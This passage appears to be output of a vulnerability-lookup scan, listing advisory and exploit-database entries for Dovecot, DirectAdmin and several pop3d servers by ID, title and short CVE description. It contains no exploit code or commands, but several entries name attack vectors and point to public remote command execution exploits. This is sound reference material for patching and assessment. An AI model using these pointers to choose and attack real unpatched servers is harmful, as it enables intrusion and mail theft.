17315| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
17316| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
17317| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
17318| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
17319| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
17320| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
17321| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
17322| [95100] DirectAdmin up to 1.50.1 Crash denial of service
17323| [69835] Dovecot 2.2.0/2.2.1 denial of service
17324| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
17325| [65684] Dovecot up to 2.2.6 unknown vulnerability
17326| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17327| [63692] Dovecot up to 2.0.15 spoofing
17328| [7062] Dovecot 2.1.10 mail-search.c denial of service
17329| [62578] DirectAdmin 1.403 cross site scripting
17330| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
17331| [57517] Dovecot up to 2.0.12 Login directory traversal
17332| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
17333| [57515] Dovecot up to 2.0.12 Crash denial of service
17334| [54944] Dovecot up to 1.2.14 denial of service
17335| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
17336| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
17337| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
17338| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
17339| [53277] Dovecot up to 1.2.10 denial of service
17340| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
17341| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
17342| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
17343| [45256] Dovecot up to 1.1.5 directory traversal
17344| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
17345| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17346| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
17347| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
17348| [40356] Dovecot 1.0.9 Cache unknown vulnerability
17349| [38747] DirectAdmin 1.30.2 cross site scripting
17350| [38222] Dovecot 1.0.2 directory traversal
17351| [37578] DirectAdmin 1.30.1 cross site scripting
17352| [36376] Dovecot up to 1.0.x directory traversal
17353| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
17354| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
17355| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
17356| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
17357| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
17358| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
17359|
17360| MITRE CVE - https://cve.mitre.org:
17361| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17362| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
17363| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
17364| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
17365| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
17366| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
17367| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
17368| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
17369| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
17370| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
17371| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17372| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17373| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
17374| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
17375| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
17376| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
17377| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
17378| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
17379| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
17380| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
17381| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
17382| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
17383| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
17384| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
17385| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
17386| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
17387| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
17388| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
17389| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
17390| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
17391| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
17392| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
17393| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
17394| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
17395| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
17396| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
17397| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
17398| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
17399| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
17400| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
17401| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
17402| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
17403| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
17404| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
17405| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
17406| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
17407| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
17408| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
17409| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
17410|
17411| SecurityFocus - https://www.securityfocus.com/bid/:
17412| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
17413| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
17414| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
17415| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
17416| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
17417| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
17418| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
17419| [67306] Dovecot Denial of Service Vulnerability
17420| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
17421| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
17422| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
17423| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
17424| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
17425| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
17426| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
17427| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17428| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
17429| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
17430| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
17431| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
17432| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
17433| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
17434| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
17435| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
17436| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
17437| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
17438| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
17439| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
17440| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
17441| [39838] tpop3d Remote Denial of Service Vulnerability
17442| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
17443| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
17444| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
17445| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
17446| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
17447| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
17448| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
17449| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
17450| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
17451| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
17452| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
17453| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
17454| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
17455| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
17456| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
17457| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
17458| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
17459| [23254] DirectAdmin Logfile HTML Injection Vulnerability
17460| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
17461| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
17462| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
17463| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
17464| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
17465| [17961] Dovecot Remote Information Disclosure Vulnerability
17466| [16672] Dovecot Double Free Denial of Service Vulnerability
17467| [8495] akpop3d User Name SQL Injection Vulnerability
17468| [8473] Vpop3d Remote Denial Of Service Vulnerability
17469| [3990] ZPop3D Bad Login Logging Failure Vulnerability
17470| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
17471|
17472| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17473| [86382] Dovecot POP3 Service denial of service
17474| [85490] DirectAdmin Backup System email account functionality symlink
17475| [85488] DirectAdmin Backup System symlink
17476| [84396] Dovecot IMAP APPEND denial of service
17477| [80453] Dovecot mail-search.c denial of service
17478| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
17479| [72685] DirectAdmin domain parameter cross-site request forgery
17480| [71354] Dovecot SSL Common Name (CN) weak security
17481| [67675] Dovecot script-login security bypass
17482| [67674] Dovecot script-login directory traversal
17483| [67589] Dovecot header name denial of service
17484| [67254] DirectAdmin MySQL information disclosure
17485| [67253] DirectAdmin hard link privilege escalation
17486| [63267] Apple Mac OS X Dovecot information disclosure
17487| [62340] Dovecot mailbox security bypass
17488| [62339] Dovecot IMAP or POP3 denial of service
17489| [62256] Dovecot mailbox security bypass
17490| [62255] Dovecot ACL entry security bypass
17491| [60639] Dovecot ACL plugin weak security
17492| [57267] Apple Mac OS X Dovecot Kerberos security bypass
17493| [56875] DirectAdmin name cross-site scripting
17494| [56763] Dovecot header denial of service
17495| [55181] DirectAdmin account cross-site request forgery
17496| [54363] Dovecot base_dir privilege escalation
17497| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
17498| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
17499| [50167] DirectAdmin CMD_DB command execution
17500| [49416] DirectAdmin CMD_DB backup action symlink
17501| [46323] Dovecot dovecot.conf information disclosure
17502| [46227] Dovecot message parsing denial of service
17503| [45669] Dovecot ACL mailbox security bypass
17504| [45667] Dovecot ACL plugin rights security bypass
17505| [41085] Dovecot TAB characters authentication bypass
17506| [41009] Dovecot mail_extra_groups option unauthorized access
17507| [39342] Dovecot LDAP auth cache configuration security bypass
17508| [36510] DirectAdmin user parameter cross-site scripting
17509| [35767] Dovecot ACL plugin security bypass
17510| [35177] DirectAdmin domain parameter cross-site scripting
17511| [34082] Dovecot mbox-storage.c directory traversal
17512| [33390] DirectAdmin log file cross-site scripting
17513| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
17514| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
17515| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
17516| [26578] Cyrus IMAP pop3d buffer overflow
17517| [26536] Dovecot IMAP LIST information disclosure
17518| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
17519| [24709] Dovecot APPEND command denial of service
17520| [13018] akpop3d authentication code SQL injection
17521| [7345] Slackware Linux imapd and ipop3d core dump
17522| [6269] imap, ipop2d and ipop3d buffer overflows
17523| [5923] Linuxconf vpop3d symbolic link
17524| [4918] IPOP3D, Buffer overflow attack
17525| [1560] IPOP3D, user login successful
17526| [1559] IPOP3D user login to remote host successful
17527| [1525] IPOP3D, user logout
17528| [1524] IPOP3D, user auto-logout
17529| [1523] IPOP3D, user login failure
17530| [1522] IPOP3D, brute force attack
17531| [1521] IPOP3D, user kiss of death logout
17532| [418] pop3d mktemp creates insecure temporary files
17533|
17534| Exploit-DB - https://www.exploit-db.com:
17535| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
17536| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
17537| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
17538| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
17539| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
17540| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
17541| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
17542| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
17543| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
17544| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
17545| [23053] Vpop3d Remote Denial of Service Vulnerability
17546| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
17547| [11893] tPop3d 1.5.3 DoS
17548| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
17549| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
17550| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
17551| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
17552| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
17553| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
17554| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
17555|
17556| OpenVAS (Nessus) - http://www.openvas.org:
17557| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
17558| [901025] Dovecot Version Detection
17559| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
17560| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
17561| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
17562| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
17563| [870607] RedHat Update for dovecot RHSA-2011:0600-01
17564| [870471] RedHat Update for dovecot RHSA-2011:1187-01
17565| [870153] RedHat Update for dovecot RHSA-2008:0297-02
17566| [863272] Fedora Update for dovecot FEDORA-2011-7612
17567| [863115] Fedora Update for dovecot FEDORA-2011-7258
17568| [861525] Fedora Update for dovecot FEDORA-2007-664
17569| [861394] Fedora Update for dovecot FEDORA-2007-493
17570| [861333] Fedora Update for dovecot FEDORA-2007-1485
17571| [860845] Fedora Update for dovecot FEDORA-2008-9202
17572| [860663] Fedora Update for dovecot FEDORA-2008-2475
17573| [860169] Fedora Update for dovecot FEDORA-2008-2464
17574| [860089] Fedora Update for dovecot FEDORA-2008-9232
17575| [840950] Ubuntu Update for dovecot USN-1295-1
17576| [840668] Ubuntu Update for dovecot USN-1143-1
17577| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
17578| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
17579| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
17580| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
17581| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
17582| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
17583| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
17584| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
17585| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
17586| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
17587| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
17588| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
17589| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
17590| [70259] FreeBSD Ports: dovecot
17591| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
17592| [66522] FreeBSD Ports: dovecot
17593| [65010] Ubuntu USN-838-1 (dovecot)
17594| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
17595| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
17596| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
17597| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
17598| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
17599| [62854] FreeBSD Ports: dovecot-managesieve
17600| [61916] FreeBSD Ports: dovecot
17601| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
17602| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
17603| [60528] FreeBSD Ports: dovecot
17604| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
17605| [60089] FreeBSD Ports: dovecot
17606| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
17607| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
17608|
17609| SecurityTracker - https://www.securitytracker.com:
17610| [1028744] DirectAdmin Backup System Flaws Let Local Users Gain Elevated Privileges
17611| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
17612| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
17613| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
17614|
17615| OSVDB - http://www.osvdb.org:
17616| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
17617| [94899] DirectAdmin Backup System Unspecified Email Account Function Symlink Local Privilege Escalation
17618| [94898] DirectAdmin Backup System Unspecified Symlink Arbitrary File Manipulation Local Privilege Escalation
17619| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
17620| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17621| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
17622| [80919] DirectAdmin CMD_DOMAIN Multiple Parameter XSS
17623| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
17624| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
17625| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
17626| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
17627| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
17628| [72119] DirectAdmin Backup Creation Hard Link Check Weakness Local Privilege Escalation
17629| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
17630| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
17631| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
17632| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
17633| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
17634| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
17635| [66113] Dovecot Mail Root Directory Creation Permission Weakness
17636| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
17637| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
17638| [66110] Dovecot Multiple Unspecified Buffer Overflows
17639| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
17640| [64783] Dovecot E-mail Message Header Unspecified DoS
17641| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
17642| [62914] DirectAdmin CMD_DB_VIEW name Parameter XSS
17643| [62796] Dovecot mbox Format Email Header Handling DoS
17644| [61395] DirectAdmin Admin Account Creation CSRF
17645| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
17646| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
17647| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
17648| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
